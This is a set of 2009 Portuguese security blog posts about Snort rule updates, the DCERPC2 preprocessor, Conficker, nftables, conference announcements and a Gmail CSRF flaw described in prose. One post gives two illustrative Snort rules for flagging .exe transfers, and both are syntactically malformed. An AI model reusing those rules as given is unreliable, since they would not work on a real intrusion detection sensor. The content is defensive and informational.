Esse post tem o intuito de avisar que voce SOMENTE conseguirá ter as REGRAS MAIS ATUALIZADAS se fizer o update para o snort 2.8.4 e configurar seu pré-processador DCERPC2.


Deem uma olhada nesse posts da Sourcefire

"This release updates the VRT Certified Snort Rules to utilize the new DCE/RPC v2 preprocessor. This change deletes more than 5000 rules in the netbios rule category and replaces them with a much smaller rule set. It aslo contains additional detection for hosts that are currently infected with the Conficker worm. "

http://www.snort.org/vrt/advisories/vrt-rules-2009-04-08.html

Vejam tambem

http://vrt-sourcefire.blogspot.com/2009/04/snort-284-is-nigh.html

ATUALIZEM seus snort para 2.8.4 o mais rapido possivel, logicamente entendam o dcerpc2 antes =)

* When downloading rules it is important to note that the 2.8 subscription release is for Snort version 2.8.4 and these rules WILL NOT work with older versions of Snort. This includes 2.8.3 and earlier. In 30 days time, these packages will be rolled over to registered users, when this happens the registered user rule tarballs will also contain the changes to the netbios rule set.

Happy Snorting!

Rodrigo Montoro(Sp0oKeR)

segunda-feira, 23 de março de 2009

Antebellum sobre PCI - Revista ISSA Brasil - edição 06

A edição março/abril da Antebellum já está disponível no site da ISSA Brasil:
A Antebellum é a revista eletrônica bimestral da ISSA Capítulo Brasil. A edição deste mês tem, como tema de capa, o padrão PCI-DSS e conta com diversos artigos sobre este e outros assuntos de grande interesse da comunidade de segurança:
  • Data Security Standard
  • As Vulnerabilidades no POS
  • Para inglês ver?
  • Conformidade: por onde começar?
  • ISO/IEC 15.408 não é para desenvolvimento seguro
  • Terceirização: Uma análise do ponto de vista de Segurança da Informação
  • Microsoft Forefront Threat Management Gateway (TMG)
  • Segurança da Informação em Tempos de Crise
  • Você está preparado para o CISSP?
  • Segurança no Windows 7
  • A Privacidade como Limitador do Monitoramento Digital
Com o apoio da CLM (www.clm.com.br), criamos uma versão especial impressa dessa edição, que foi entregue para os participantes do ISSA Day de Março (realizado em 19/03) e que ainda iremos distribuir excusivamente nos próximos eventos da ISSA Brasil.
Excepcionalmente, não lançamos uma edição da revista no início do ano, referente aos meses de Janeiro e Fevereiro. Assim, a revista atual, de número 06, se tornou a primeira edição deste ano.
A próxima edição da Antebellum, para os meses de Maio e Junho, terá como tema central a Segurança de Aplicações, e estamos aceitando artigos até o dia 02/04. Colabore, envie sua contribuição para nós.

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

domingo, 22 de março de 2009

nftables - sucessor iptables ?

Li sobre um novo projeto dos desenvolvedores do netfilter que me parece MUITO interessante. O projeto é chamada de nftables (versão alpha ainda) e segunda o release acredito que num futuro venha a "substituir" o bom e velho iptables =). Abaixo algumas partes do release :

There are three main components:

- the kernel implementation
- libnl netlink communication
- nftables userspace frontend

At this point a few example might be in order ...

- a single rule, specified incrementally on the command line:

# nft add rule output tcp dport 22 log accept

The default address family is IPv4, the default table is filter. The
full specification would look like this:

# nft add rule inet filter output tcp dport 22 log accept

- a chain containing multiple rules:

#! nft -f

include "ipv4-filter"

chain filter output {
ct state established,related accept
tcp dport 22 accept
counter drop
}

creates the filter table based on the definitions from "ipv4-filter"
and populates the output chain with the given three rules.

OK, back to the internals. After the input has been parsed, it is
evaluated. This stage performs some basic transformations, like
constant folding and propagation, as well as most semantic checks.

During this step, a protocol context is built based on the current
address family and the specified matches, which describes the protocols
of packets that might hit later operations in the same rule. This
allows two things:

- conflict detection:

... ip protocol tcp udp dport 53

results in:

:1:37-45: Error: conflicting protocols specified: tcp vs. udp
add filter output ip protocol tcp udp dport 53
^^^^^^^^^

Fonte completa: http://thread.gmane.org/gmane.comp.security.firewalls.netfilter.devel/28922


Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

segunda-feira, 16 de março de 2009

Call for papers: You Shot The Sheriff (YSTS) v3.0

A chamada para submissao de apresentacoes do YSTS 3.0 esta aberta!

A terceira edicao ocorrera em Sao Paulo, em 22 de Junho de 2009

INTRODUCAO

O YSTS e' um evento unico, de alto nivel, com foco na comunidade de seguranca da informacao brasilera, com participacao de palestrantes nacionais e internacionais.

Buscando combinar apresentacoes de alta qualidade, cobrindo os mais diversos topicos relacionados com seguranca da informacao, do nivel mais tecnico ao gerencial.

O objetivo e' permitir que a audiencia compreenda a abrangencia do mundo da seguranca da informacao, que exige entendimento das particularidades dos varios segmentos deste mercado.

Este e' um evento apenas para convidados. Assim sendo, submeter uma palestra e', certamente, um excelente modo de garantir a participacao no evento.

Devido ao sucesso das edicao anteriores, nos mantivemos o mesmo formato:

- - Ambiente confortavel e descontraido

- - O local do YSTS 3.0 sera informado apenas aos convidados

- - Como nas edicoes anteriores, o local secreto sera um bar fechado ou club

- - E sim havera comida e bebida

TOPICOS

Os focos de interesse, para o YSTS 3.0, sao:

* Sistemas Operacionais

* Topicos relacionados com carreira e gestao

* Dispositivos moveis/Sistemas embarcados

* Auditoria e controle

* Web e coisas 2.0

* Politicas para seguranca da informacao

* Telecomunicacao/Redes/Radio frequencias

* Respostas a incidentes e politicas (uteis) relacionadas

* Guerra cibernetica

* Malware/ BotNets

* Concientizacao de usuarios/Problemas em redes sociais

* Programacao segura

* Espacos e comunidades hacker

* Fuzzing

* Seguranca fisica

* Virtualizacao

* Criptografia/Ofuscacao

* Infraestrutura e sistemas criticos

* CAPTCHAS inviolaveis

* E qualquer outro topico relacionado com seguranca que voce imagine relevante para a conferencia

Nos gostamos de palestras curtas, 30 minutos costuma ser suficiente para passar o recado, se voce achar que necessita de mais tempo, faca essa observacao na sua submissao.

REGALIAS AOS PALESTRANTES

* Auxilio para despesas de viagem e hospedagem, para palestrantes fora de Sao Paulo, no valor de R$ 700,00 (Setecentos reais).

* Cafe da manha, almoco e jantar, durante a conferencia

* Festa pos-conferencia

* Auditoria de produto em pizzarias/churrascarias tradicionais

SUBMISSAO

Cada submissao deve incluir as segintes informacoes:

* Nome, titulo, endereco, email e telefone/numero de contato

* resumo biografico e qualificacoes

* Experiencia em apresentacoes

* Sumario e abstrato da sua apresentacao

* Se ja tiver produzido algum material envie tambem (ppt, pdf, etc.)

* Requisitos tecnicos (alem do projetor)

* Outras publicacoes ou conferencia onde este materia foi ou sera publicado/submetido

Nos aceitamos submissoes e apresentacoes em Ingles, Portugues e Espanhol

DATAS IMPORTANTES

Data final para submissoes - 10 de Maio de 2009
Notificacao dos autores aceitos - 20 de Maio de 2009
Envio do material para apresentacoes aceitas - 15 Junho 2009

Por favor envie sua submissao para cfp/at/ysts.org

CONTATO

Informacoes gerais: b0ard/at/ysts.org

Patrocinio: sponsors/at/ysts.org

Esperamos voce!

Site: http://www.ysts.org

quarta-feira, 11 de março de 2009

Pegando binários a partir do pcap

Vi esse post demonstrando facilmente como pegar o binário através do pcap. Com certeza isso é MUITO interessante, até como exemplos podemos criar regras no snort para logar o tráfego de binários exe em portas http por exemplo, para depois fazermos a analise. Logicamente poderiamos fazer isso para outros protocolos, correlacionar com a politica de seguranca, usar da maneira que imaginar .

Por exemplo uma regra BEM simples para tráfego SMTP, não utilizem em ambientes de produção, caso queira podemos refinar num futuro, so mandar e-mail

alert $HOME_NET any -> $SMTP_SERVER 25 (msg:"Arquivo EXE para servidor de e-mail, possivel virus"; sid:100000000; content:".exe";nocase;)

Ou simplemesnte um GET web

alert $ HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Arquivo EXE recebido via GET porta 80";sid:10000000001;uricontent:".exe";nocase;)

Como citei, regras extremamente simples , so para ilustrar as possibilidades =)

O link para o artigo em inglês: "Pulling Binaries from pcap"

Happy Snorting!

Rodrigo Montoro(Sp0oKeR)

sexta-feira, 6 de março de 2009

Notícias interessantes e links

Estou ministrando um treinamento em um cliente do Rio de Janeiro e a semana está meio corrida, mas algumas coisas intessantes que acompanhei e vi =)

Vídeos Defcon 16 no ar

https://www.defcon.org/podcast/defcon-16-video.rss

Vulnerabilidade CSRF Gmail - round two by N-Stalker Labs

http://community.nstalker.com/csrf-vulnerability-in-gmail-service-round-two


Ferramentas de web bugadas para aprendizados - excelente lista com dezenas de projetos/softwares que simulam sistemas web bugados para estudar web app sec

http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security


Lista de Fuzzers

http://www.krakowlabs.com/lof.html


Happy Hacking!

Rodrigo Montoro (Sp0oKeR)

terça-feira, 3 de março de 2009

Cuidado: CSRF vulnerability in GMail service

Caros,

Saiu na fulldisclosure uma falha que chega a ser ridicula no gmail . A falha permite que utilizando CSRF ( Cross Site Request Forgery) voce consiga modificar o password da conta do gmail do usuario que mandar o site com os parametros nele.

Fizemos 2 posts sobre no blog da N-Stalker Labs .

Ingles: http://community.nstalker.com/csrf-vulnerability-in-gmail-service
pt_BR: http://community.nstalker.com/csrf-vulnerability-in-gmail-service-pt_br

* Galera, só pra ficar mais claro problema é um CSRF (Cross Site Request Forgery) que possibilita o Brute Force. O CSRF por si so não faz nada , ele só é o facilitador =)

CUIDADO onde clicam!!!

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

segunda-feira, 2 de março de 2009

ISSA Day Março

Após um perido sem ISSA Days por feriados, em Março o ISSA Day volta com tudo e com duas excelentes palestras e sorteio de um Wii =)

Data: 19 de Março de 2009.
Horário: 19h00 às 22h00
Local: Sonesta São Paulo Ibirapuera
Endereço: Avenida Ibirapuera, 2534 - Moema

Programação
19h00 às 19h15 Apresentação ISSA - Anchises de Paula - Presidente
19h15 às 20h15 "Security Through Whitelisting" - David Thomason
20h15 às 20h45 Coffee Break
20h45 às 22h00 "BOUNCER by CoreTrace" - Apresentação e Demonstração - David Thomason
22h00 às 22h10 Sorteio de um Nintendo Wii somente para os presentes

Para se cadastrar: http://www.clm.com.br/newsletter/Convite_ISSADAY/convite_issaday_2009marco.htm

Vejo vocês por lá!

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

sexta-feira, 27 de fevereiro de 2009

Novo Pré-Processador dcerpc2 e ruleset / Falso positivos / Conficker

A semanas atrás fizemos (tradução do blog do VRT) o post no snort-br sobre o lançamento do novo pré-processador dcerpc2 no RC do snort 2.8.4 em http://snort.org.br/index.php?option=com_content&task=view&id=76&Itemid=43

Dias após o lançamento do novo modulo no qual uma das caracteristicas sera a melhoria de performance e menor número de regras, o pessoal do VRT da Sourcefire fez o release das novas regras baseado na utilização do novo pré processor.

http://vrt-sourcefire.blogspot.com/2009/02/dcerpc2-ruleset-now-available.html

Interessante que de mais de 5000 regras o novo ruleset possui por volta de algumas dezenas como poderão ver em http://www.snort.org/vrt/tools/dcerpc2-snort-2.8.4-RC-1.rules

Algo que me chamou atenção foi a quantidade de paginas de documentação do dcerpc2, por volta de 14 paginas, o que mostra que esse pre-processador é de suma importancia ser bem configurado, assim como o bom e velho http_inspect. Deem uma olhada no README do mesmo http://www.snort.org/vrt/tools/README.dcerpc2

Reportar Falso positivos ?

O VRT como todo outra equipe no mundo não consegue gerar regras perfeitas para todos ambientes e escreveram ano passado sobre como reportar um Falso Positivo, sendo que assim eles podem fazer o tuning das regras

http://www.snort.org/vrt/falsepos.html

Qual o motivo de citar o Conficker ?

A quantidade de regras geradas pelo conficker, bem como as milhares ja existente fizeram com que a performance dos sensores ficasse totalmente utilizada, sendo que eu acredito que o conficker foi um grande impulso para o novo pre processador.

Como citado, saiu a variante B++ do conficker, e as regras do snort ainda detectam visto que a forma de propagação na rede

Vejam http://vrt-sourcefire.blogspot.com/2009/02/conficker-variant-b-still-detected.html


Sucesso na utlização do novo pré-processor e espero que na sejam infectados com o conficker =)


Happy Snorting!

Rodrigo Montoro (Sp0oKeR)

quinta-feira, 26 de fevereiro de 2009

Sp0oKeR Virtual World

english

I'm that kind of guy that love to use all social networking stuff and blogging . If you like and wanna become my friend or follow my stuff extra blog click URL bellow.

Linkedin: http://www.linkedin.com/in/spooker
Twitter Personal: http://www.twitter.com/spookerlabs
Twitter N-Stalker Labs: http://www.twitter.com.br/nstalker
N-Stalker Research Labs: http://community.nstalker.com/
Snort Brazilian Group: http://www.snort.org.br
Training Company: http://www.dynsec.com.br

Most of my time I'm working and/or having fun on something listed above . I'll post soon my friends blog =)


pt_BR

Sou do tipo de pessoa que adora rede sociais e blogar. Se voce tambem curte, quer me adicionar na sua rede de amigos ou seguir o que faço no dia a dia basta seguir os links abaixo:

Linkedin: http://www.linkedin.com/in/spooker
Twitter Pessoal: http://www.twitter.com/spookerlabs
Twitter N-Stalker Labs: http://www.twitter.com.br/nstalker
Laboratório de pesquisas da N-Stalker : http://community.nstalker.com/
Grup Usuário Snort Brasil: http://www.snort.org.br
Empresa de Treinamentos: http://www.dynsec.com.br

Maioria do meu tempo estou trabalhando e/ou me divertindo nesses links. Em breve postarei o blog dos meus amigos por aqui.


Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

quarta-feira, 25 de fevereiro de 2009

Novo blog / New blog

pt_BR

Após alguns anos utilizando o multiply decidi migrar para o blogspot visto que o multiply estava muito engessado.

Espero contar com os leitores do outro blog (isso se voces existirem eheheh).

Continuem acompanhado e espero postar bastante novidades aqui.

english

After years using multiply I solved to change to blogspot cause multiply was so bad to change stuff and "freedom".

I hope to keep readers from other blog here too (if anyone read that ) .

Keep following my blog and I hope to have news .

Coisas Antigas / Old Stuff - http://spookerlabs.multiply.com

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)